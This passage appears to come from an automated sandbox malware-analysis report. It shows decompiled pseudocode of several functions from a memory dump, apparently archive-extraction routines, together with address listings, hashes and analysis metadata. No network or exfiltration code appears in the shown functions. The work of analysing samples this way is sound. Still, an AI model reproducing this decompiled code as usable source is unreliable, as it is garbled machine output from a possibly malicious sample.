						if(_t199 >= 0x1c) {
							goto L18;
						}
						__eflags =  *(_t226 - 0x14) - 0x1f;
						if( *(_t226 - 0x14) <= 0x1f) {
							goto L18;
						}
						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
						if( *((char*)(_t160 + 0x1c)) != 0x52) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
						if( *((char*)(_t160 + 0x1d)) != 0x53) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
						if( *((char*)(_t160 + 0x1e)) != 0x46) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
						if( *((char*)(_t160 + 0x1f)) == 0x58) {
							goto L18;
						}
						goto L15;
						L16:
						_t220 = _t220 + 1;
						__eflags = _t220 - _t109;
					} while (_t220 < _t109);
					goto L21;
				}
				 *(_t167 + 0x6cc8) = _t103;
				if(_t103 == 1) {
					_t216 =  *_t167;
					_t220 =  *(_t216 + 0x14);
					 *0xcf3278(0);
					_t162 =  *( *(_t216 + 0x14))();
					asm("sbb edx, 0x0");
					 *0xcf3278(_t162 - 7, __edx);
					 *((intOrPtr*)(_t216 + 0x10))();
					_t212 = 7;
				}
				goto L26;
			}








































                                                    0x00cc1a04
                                                    0x00cc1a09
                                                    0x00cc1a13
                                                    0x00cc1a18
                                                    0x00cc1a23
                                                    0x00cc1a2f
                                                    0x00cc1a36
                                                    0x00cc1a42
                                                    0x00cc1ba0
                                                    0x00cc1ba0
                                                    0x00cc1ba2
                                                    0x00cc1ba8
                                                    0x00cc1bb0
                                                    0x00cc1bb0
                                                    0x00cc1a4f
                                                    0x00cc1a52
                                                    0x00cc1a58
                                                    0x00cc1a5f
                                                    0x00cc1aa8
                                                    0x00cc1aaf
                                                    0x00cc1ab7
                                                    0x00cc1abf
                                                    0x00cc1acd
                                                    0x00cc1ad3
                                                    0x00cc1adb
                                                    0x00cc1ade
                                                    0x00cc1ae0
                                                    0x00cc1ae2
                                                    0x00cc1ae5
                                                    0x00cc1ae7
                                                    0x00cc1b8f
                                                    0x00cc1b8f
                                                    0x00cc1b96
                                                    0x00cc1b99
                                                    0x00cc1bb3
                                                    0x00cc1bb3
                                                    0x00cc1bb3
                                                    0x00cc1bb7
                                                    0x00cc1bbc
                                                    0x00cc1bbc
                                                    0x00cc1bc2
                                                    0x00cc1bc5
                                                    0x00cc1bd4
                                                    0x00cc1bd7
                                                    0x00cc1c00
                                                    0x00cc1c02
                                                    0x00cc1c0a
                                                    0x00cc1c0d
                                                    0x00cc1c12
                                                    0x00cc1c14
                                                    0x00cc1c18
                                                    0x00cc1c1a
                                                    0x00cc1c5a
                                                    0x00cc1c5a
                                                    0x00cc1c5d
                                                    0x00cc1c5d
                                                    0x00cc1c63
                                                    0x00cc1c65
                                                    0x00cc1c71
                                                    0x00cc1c71
                                                    0x00cc1c78
                                                    0x00cc1c7e
                                                    0x00cc1c7e
                                                    0x00cc1c80
                                                    0x00cc1c88
                                                    0x00cc1c88
                                                    0x00cc1c8d
                                                    0x00cc1c91
                                                    0x00000000
                                                    0x00cc1c97
                                                    0x00cc1c97
                                                    0x00cc1c97
                                                    0x00cc1ca1
                                                    0x00cc1ca7
                                                    0x00cc1dc1
                                                    0x00cc1dc1
                                                    0x00cc1dc8
                                                    0x00cc1dd3
                                                    0x00cc1de3
                                                    0x00cc1de8
                                                    0x00cc1de8
                                                    0x00000000
                                                    0x00cc1de8
                                                    0x00cc1dca
                                                    0x00cc1dd1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1dd1
                                                    0x00cc1cad
                                                    0x00cc1cb4
                                                    0x00cc1cc3
                                                    0x00cc1cc3
                                                    0x00cc1cc7
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1cd4
                                                    0x00cc1cdc
                                                    0x00cc1cde
                                                    0x00cc1ce0
                                                    0x00cc1ce8
                                                    0x00cc1cf1
                                                    0x00cc1cfa
                                                    0x00cc1d03
                                                    0x00cc1d0c
                                                    0x00cc1d54
                                                    0x00cc1d56
                                                    0x00cc1d5b
                                                    0x00cc1d5d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1d18
                                                    0x00cc1d1e
                                                    0x00cc1d21
                                                    0x00cc1d43
                                                    0x00cc1d46
                                                    0x00cc1d61
                                                    0x00cc1d68
                                                    0x00cc1d77
                                                    0x00cc1d77
                                                    0x00cc1d77
                                                    0x00cc1d79
                                                    0x00cc1d79
                                                    0x00cc1d7f
                                                    0x00cc1d82
                                                    0x00cc1d8b
                                                    0x00cc1d94
                                                    0x00cc1d9d
                                                    0x00cc1da6
                                                    0x00cc1db7
                                                    0x00cc1dbf
                                                    0x00000000
                                                    0x00cc1dbf
                                                    0x00cc1d6a
                                                    0x00cc1d71
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1d73
                                                    0x00000000
                                                    0x00cc1d73
                                                    0x00cc1d48
                                                    0x00cc1d4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1d4d
                                                    0x00cc1d4f
                                                    0x00000000
                                                    0x00cc1d4f
                                                    0x00cc1d23
                                                    0x00cc1d2a
                                                    0x00cc1d39
                                                    0x00cc1d39
                                                    0x00cc1d39
                                                    0x00cc1d3b
                                                    0x00cc1d3b
                                                    0x00000000
                                                    0x00cc1d3b
                                                    0x00cc1d2c
                                                    0x00cc1d33
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1d35
                                                    0x00000000
                                                    0x00cc1d35
                                                    0x00000000
                                                    0x00cc1d5f
                                                    0x00cc1cb6
                                                    0x00cc1cbd
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1cbd
                                                    0x00cc1c91
                                                    0x00cc1c7a
                                                    0x00cc1c7c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1c7c
                                                    0x00cc1c67
                                                    0x00cc1c6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1c6b
                                                    0x00cc1c1c
                                                    0x00cc1c1e
                                                    0x00cc1c21
                                                    0x00cc1c23
                                                    0x00cc1c28
                                                    0x00cc1c2e
                                                    0x00cc1c31
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1c37
                                                    0x00cc1c3e
                                                    0x00cc1c49
                                                    0x00cc1c4b
                                                    0x00cc1c50
                                                    0x00cc1c52
                                                    0x00cc1c56
                                                    0x00cc1c58
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1c58
                                                    0x00cc1c40
                                                    0x00cc1c43
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1c43
                                                    0x00cc1d11
                                                    0x00000000
                                                    0x00cc1d11
                                                    0x00cc1bdb
                                                    0x00cc1be4
                                                    0x00cc1be9
                                                    0x00cc1bf1
                                                    0x00cc1bf3
                                                    0x00cc1bf6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1bf8
                                                    0x00cc1bfb
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1bff
                                                    0x00000000
                                                    0x00cc1bff
                                                    0x00cc1bcd
                                                    0x00000000
                                                    0x00cc1bcd
                                                    0x00cc1b9b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1aed
                                                    0x00cc1aed
                                                    0x00cc1af0
                                                    0x00cc1af2
                                                    0x00cc1af5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1afb
                                                    0x00cc1b00
                                                    0x00cc1b02
                                                    0x00cc1b3e
                                                    0x00cc1b3e
                                                    0x00000000
                                                    0x00cc1b3e
                                                    0x00cc1b04
                                                    0x00cc1b07
                                                    0x00cc1b0d
                                                    0x00cc1b10
                                                    0x00cc1b48
                                                    0x00cc1b4a
                                                    0x00cc1b50
                                                    0x00cc1b56
                                                    0x00cc1b5c
                                                    0x00cc1b64
                                                    0x00cc1b66
                                                    0x00cc1b6c
                                                    0x00cc1b6f
                                                    0x00cc1b76
                                                    0x00cc1b80
                                                    0x00cc1b85
                                                    0x00cc1b8d
                                                    0x00000000
                                                    0x00cc1b8d
                                                    0x00cc1b71
                                                    0x00cc1b74
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b74
                                                    0x00cc1b12
                                                    0x00cc1b14
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b16
                                                    0x00cc1b19
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b1b
                                                    0x00cc1b1f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b24
                                                    0x00cc1b26
                                                    0x00cc1b2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b2c
                                                    0x00cc1b30
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b32
                                                    0x00cc1b36
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b38
                                                    0x00cc1b3c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc1b41
                                                    0x00cc1b41
                                                    0x00cc1b42
                                                    0x00cc1b42
                                                    0x00000000
                                                    0x00cc1b46
                                                    0x00cc1a61
                                                    0x00cc1a6a
                                                    0x00cc1a70
                                                    0x00cc1a73
                                                    0x00cc1a78
                                                    0x00cc1a80
                                                    0x00cc1a88
                                                    0x00cc1a8d
                                                    0x00cc1a95
                                                    0x00cc1a9a
                                                    0x00cc1a9a
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: da159a52be39d04608ee1f948dff12dd1367f39e6f53f1ebbde849830dd69ecf
                                                    • Instruction ID: eb19185973fdd5c588a98da5b24f985494a3e7ba84f642030a8cf9d88e375000
                                                    • Opcode Fuzzy Hash: da159a52be39d04608ee1f948dff12dd1367f39e6f53f1ebbde849830dd69ecf
                                                    • Instruction Fuzzy Hash: 1FC19170A00254ABEF15DF6AC494FA97BA5AF06310F0C01BDEC569B297DB309E44CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CC3BBA(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t79;
				signed int _t86;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t124;
				char _t125;
				intOrPtr _t133;
				signed int _t135;
				intOrPtr _t149;
				signed int _t152;
				void* _t155;
				void* _t157;

				E00CDEB78(0xcf26da, _t157);
				E00CDEC50(0xe6e0);
				_t155 = __ecx;
				_t160 =  *((char*)(__ecx + 0x6cdc));
				if( *((char*)(__ecx + 0x6cdc)) == 0) {
					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
					if(__eflags > 0) {
						L26:
						E00CC138B(__eflags, 0x1e, _t155 + 0x32);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
					__eflags = _t86;
					if(_t86 != 0) {
						L7:
						_t124 = _t155 + 0x20f8;
						E00CCCFD4(_t86, _t124);
						_push(_t124);
						E00CD2089(_t157 - 0xe6ec, __eflags);
						_t125 = 0;
						_push(0);
						_push( *((intOrPtr*)(_t155 + 0x56dc)));
						 *((intOrPtr*)(_t157 - 4)) = 0;
						E00CD3377(0, _t157 - 0xe6ec);
						_t152 =  *(_t157 + 8);
						__eflags =  *(_t157 + 0xc);
						if( *(_t157 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
								L18:
								E00CCAB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
								 *((char*)(_t155 + 0x2128)) = _t125;
								E00CCD099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
								_t135 =  *(_t155 + 0x564c);
								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
								 *(_t157 - 0x9aa0) = _t135;
								 *((char*)(_t157 - 0x9a8c)) = _t125;
								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
								if(__eflags != 0) {
									E00CD3020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
								} else {
									_push(_t135);
									_push(_t96);
									_push(_t155 + 0x20f8); // executed
									E00CC9215(_t125, _t152, __eflags); // executed
								}
								asm("sbb eax, eax");
								__eflags = E00CCAAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
								if(__eflags != 0) {
									_t125 = 1;
								} else {
									E00CC2021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
									E00CC6D83(0xd01098, 3);
									__eflags = _t152;
									if(_t152 != 0) {
										E00CC3EDE(_t152);
									}
								}
								L25:
								E00CD2297(_t157 - 0xe6ec, _t152, _t155);
								_t79 = _t125;
								goto L28;
							}
							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
								goto L25;
							}
							asm("sbb ecx, ecx");
							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
							E00CCD051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
							goto L18;
						}
						__eflags =  *(_t155 + 0x564c);
						if(__eflags < 0) {
							L12:
							__eflags = _t152;
							if(_t152 != 0) {
								E00CC20BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
								E00CCD0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
							} else {
								 *((char*)(_t155 + 0x2129)) = 1;
							}
							goto L15;
						}
						if(__eflags > 0) {
							L11:
							E00CC138B(__eflags, 0x1e, _t155 + 0x32);
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
						if(__eflags <= 0) {
							goto L12;
						}
						goto L11;
					}
					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
						goto L7;
					} else {
						_t79 = 1;
						goto L28;
					}
				} else {
					E00CC138B(_t160, 0x1d, __ecx + 0x32);
					E00CC6D83(0xd01098, 3);
					L27:
					_t79 = 0;
					L28:
					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
					return _t79;
				}
			}


















                                                    0x00cc3bbf
                                                    0x00cc3bc9
                                                    0x00cc3bcf
                                                    0x00cc3bd1
                                                    0x00cc3bd8
                                                    0x00cc3bf6
                                                    0x00cc3bfd
                                                    0x00cc3e51
                                                    0x00cc3e57
                                                    0x00000000
                                                    0x00cc3e57
                                                    0x00cc3c05
                                                    0x00cc3c16
                                                    0x00cc3c1c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3c28
                                                    0x00cc3c28
                                                    0x00cc3c2e
                                                    0x00cc3c3f
                                                    0x00cc3c40
                                                    0x00cc3c49
                                                    0x00cc3c4e
                                                    0x00cc3c55
                                                    0x00cc3c5a
                                                    0x00cc3c62
                                                    0x00cc3c63
                                                    0x00cc3c69
                                                    0x00cc3c6c
                                                    0x00cc3c71
                                                    0x00cc3c74
                                                    0x00cc3c77
                                                    0x00cc3ccc
                                                    0x00cc3ccc
                                                    0x00cc3cd2
                                                    0x00cc3d2e
                                                    0x00cc3d3c
                                                    0x00cc3d41
                                                    0x00cc3d4a
                                                    0x00cc3d50
                                                    0x00cc3d56
                                                    0x00cc3d63
                                                    0x00cc3d69
                                                    0x00cc3d6f
                                                    0x00cc3d75
                                                    0x00cc3d7d
                                                    0x00cc3d89
                                                    0x00cc3d95
                                                    0x00cc3d9b
                                                    0x00cc3da1
                                                    0x00cc3da7
                                                    0x00cc3dad
                                                    0x00cc3db3
                                                    0x00cc3db9
                                                    0x00cc3dbf
                                                    0x00cc3dc5
                                                    0x00cc3de4
                                                    0x00cc3dc7
                                                    0x00cc3dc7
                                                    0x00cc3dc8
                                                    0x00cc3dcf
                                                    0x00cc3dd0
                                                    0x00cc3dd0
                                                    0x00cc3dfe
                                                    0x00cc3e0f
                                                    0x00cc3e11
                                                    0x00cc3e3e
                                                    0x00cc3e13
                                                    0x00cc3e20
                                                    0x00cc3e2c
                                                    0x00cc3e31
                                                    0x00cc3e33
                                                    0x00cc3e37
                                                    0x00cc3e37
                                                    0x00cc3e33
                                                    0x00cc3e40
                                                    0x00cc3e46
                                                    0x00cc3e4c
                                                    0x00000000
                                                    0x00cc3e4e
                                                    0x00cc3cd4
                                                    0x00cc3cda
                                                    0x00cc3ce0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3d10
                                                    0x00cc3d12
                                                    0x00cc3d12
                                                    0x00cc3d29
                                                    0x00000000
                                                    0x00cc3d29
                                                    0x00cc3c79
                                                    0x00cc3c7f
                                                    0x00cc3c9f
                                                    0x00cc3c9f
                                                    0x00cc3ca1
                                                    0x00cc3cb4
                                                    0x00cc3cc7
                                                    0x00cc3ca3
                                                    0x00cc3ca3
                                                    0x00cc3ca3
                                                    0x00000000
                                                    0x00cc3ca1
                                                    0x00cc3c81
                                                    0x00cc3c8f
                                                    0x00cc3c95
                                                    0x00000000
                                                    0x00cc3c95
                                                    0x00cc3c83
                                                    0x00cc3c8d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc3c8d
                                                    0x00cc3c30
                                                    0x00cc3c36
                                                    0x00000000
                                                    0x00cc3c38
                                                    0x00cc3c38
                                                    0x00000000
                                                    0x00cc3c38
                                                    0x00cc3bda
                                                    0x00cc3be0
                                                    0x00cc3bec
                                                    0x00cc3e5c
                                                    0x00cc3e5c
                                                    0x00cc3e5e
                                                    0x00cc3e62
                                                    0x00cc3e6a
                                                    0x00cc3e6a

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 946966ca5459b178296c2dfea588ab13204201a42ffd82299b6fcf83bcfd6acf
                                                    • Instruction ID: 88922e7829fd0fd1d6647ba81d6f341057ff1616b0077a60a8725d10167e6b95
                                                    • Opcode Fuzzy Hash: 946966ca5459b178296c2dfea588ab13204201a42ffd82299b6fcf83bcfd6acf
                                                    • Instruction Fuzzy Hash: B571F471500B849EDB35EB74D855FEBB7E9AF14300F40492EE2AB87242DA327A84DF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CC8284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				char _t48;
				void* _t51;
				intOrPtr _t54;
				void* _t56;
				char _t58;
				signed int _t84;
				intOrPtr _t85;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				void* _t99;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edi;
				_t92 = __edx;
				E00CDEB78(0xcf2831, _t99);
				E00CDEC50(0x9d64);
				_t97 = __ecx;
				_t1 = _t99 - 0x9d70; // -38256
				_push( *((intOrPtr*)(__ecx + 8)));
				E00CC13DC(_t1, __edi, _t102);
				 *((intOrPtr*)(_t99 - 4)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
					_t8 = _t99 - 0x9d70; // -38256
					_t48 = E00CC9F42(_t8, __edi, __ecx, __ecx + 0xfe);
					__eflags = _t48;
					if(_t48 != 0) {
						goto L3;
					}
				} else {
					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
					L3:
					_t9 = _t99 - 0x9d70; // -38256, executed
					_t51 = E00CC1A04(_t9, _t92, 1); // executed
					if(_t51 != 0) {
						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
							_push(_t94);
							_t95 = 0;
							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
							if(__eflags != 0) {
								_t12 = _t99 - 0x9d3e; // -38206
								_t13 = _t99 - 0x1010; // -2064
								_t65 = E00CD0602(_t13, _t12, 0x800);
								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
								while(1) {
									_t19 = _t99 - 0x1010; // -2064
									E00CCC0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t20 = _t99 - 0x2058; // -6232
									E00CC6EDB(_t20);
									_push(0);
									_t21 = _t99 - 0x2058; // -6232
									_t22 = _t99 - 0x1010; // -2064
									__eflags = E00CCA56D(_t20, __eflags, _t22, _t21);
									if(__eflags == 0) {
										break;
									}
									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
									asm("adc ebx, [ebp-0x1054]");
									__eflags =  *((char*)(_t99 - 0x309e));
								}
								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
								asm("adc [esi+0xa4], ebx");
							}
							_t25 = _t99 - 0x9d70; // -38256
							E00CC8430(_t97, __eflags, _t25);
							_t54 =  *((intOrPtr*)(_t97 + 8));
							_t93 = 0x49;
							_pop(_t94);
							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
							__eflags = _t84 - 0x54;
							if(_t84 == 0x54) {
								L13:
								 *((char*)(_t54 + 0x7201)) = 1;
							} else {
								__eflags = _t84 - _t93;
								if(_t84 == _t93) {
									goto L13;
								}
							}
							_t85 =  *((intOrPtr*)(_t97 + 8));
							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
								E00CD1B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
							}
							_t35 = _t99 - 0x9d70; // -38256
							E00CC1F6D(_t35, _t93);
							do {
								_t36 = _t99 - 0x9d70; // -38256
								_t56 = E00CC3B2D(_t36, _t93, _t97);
								_t37 = _t99 - 0xd; // 0x7f3
								_t38 = _t99 - 0x9d70; // -38256
								_t58 = E00CC848E(_t97, _t38, _t56, _t37); // executed
								__eflags = _t58;
							} while (_t58 != 0);
						}
					} else {
						E00CC6D83(0xd01098, 1);
					}
				}
				_t39 = _t99 - 0x9d70; // -38256, executed
				E00CC1692(_t39, _t94, _t97); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
				return 0;
			}


















                                                    0x00cc8284
                                                    0x00cc8284
                                                    0x00cc8284
                                                    0x00cc8289
                                                    0x00cc8293
                                                    0x00cc829a
                                                    0x00cc829c
                                                    0x00cc82a2
                                                    0x00cc82a5
                                                    0x00cc82af
                                                    0x00cc82b9
                                                    0x00cc82ce
                                                    0x00cc82d4
                                                    0x00cc82d9
                                                    0x00cc82db
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc82bb
                                                    0x00cc82bb
                                                    0x00cc82e1
                                                    0x00cc82e3
                                                    0x00cc82e9
                                                    0x00cc82f0
                                                    0x00cc8303
                                                    0x00cc8309
                                                    0x00cc830f
                                                    0x00cc8310
                                                    0x00cc8312
                                                    0x00cc8318
                                                    0x00cc831f
                                                    0x00cc8326
                                                    0x00cc832d
                                                    0x00cc8332
                                                    0x00cc834d
                                                    0x00cc8359
                                                    0x00cc8360
                                                    0x00cc8365
                                                    0x00cc836b
                                                    0x00cc8370
                                                    0x00cc8372
                                                    0x00cc8379
                                                    0x00cc8385
                                                    0x00cc8387
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc833a
                                                    0x00cc8340
                                                    0x00cc8346
                                                    0x00cc8346
                                                    0x00cc8389
                                                    0x00cc838f
                                                    0x00cc838f
                                                    0x00cc8395
                                                    0x00cc839e
                                                    0x00cc83a3
                                                    0x00cc83a8
                                                    0x00cc83a9
                                                    0x00cc83aa
                                                    0x00cc83b1
                                                    0x00cc83b4
                                                    0x00cc83bb
                                                    0x00cc83bb
                                                    0x00cc83b6
                                                    0x00cc83b6
                                                    0x00cc83b9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc83b9
                                                    0x00cc83c2
                                                    0x00cc83c5
                                                    0x00cc83cc
                                                    0x00cc83dc
                                                    0x00cc83e3
                                                    0x00cc83e3
                                                    0x00cc83e8
                                                    0x00cc83ee
                                                    0x00cc83f3
                                                    0x00cc83f3
                                                    0x00cc83f9
                                                    0x00cc83fe
                                                    0x00cc8403
                                                    0x00cc840c
                                                    0x00cc8411
                                                    0x00cc8411
                                                    0x00cc83f3
                                                    0x00cc82f2
                                                    0x00cc82f9
                                                    0x00cc82f9
                                                    0x00cc82f0
                                                    0x00cc8415
                                                    0x00cc841b
                                                    0x00cc8427
                                                    0x00cc842f

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC8289
                                                      • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                      • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$CloseFind
                                                    • String ID:
                                                    • API String ID: 2506663941-0
                                                    • Opcode ID: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
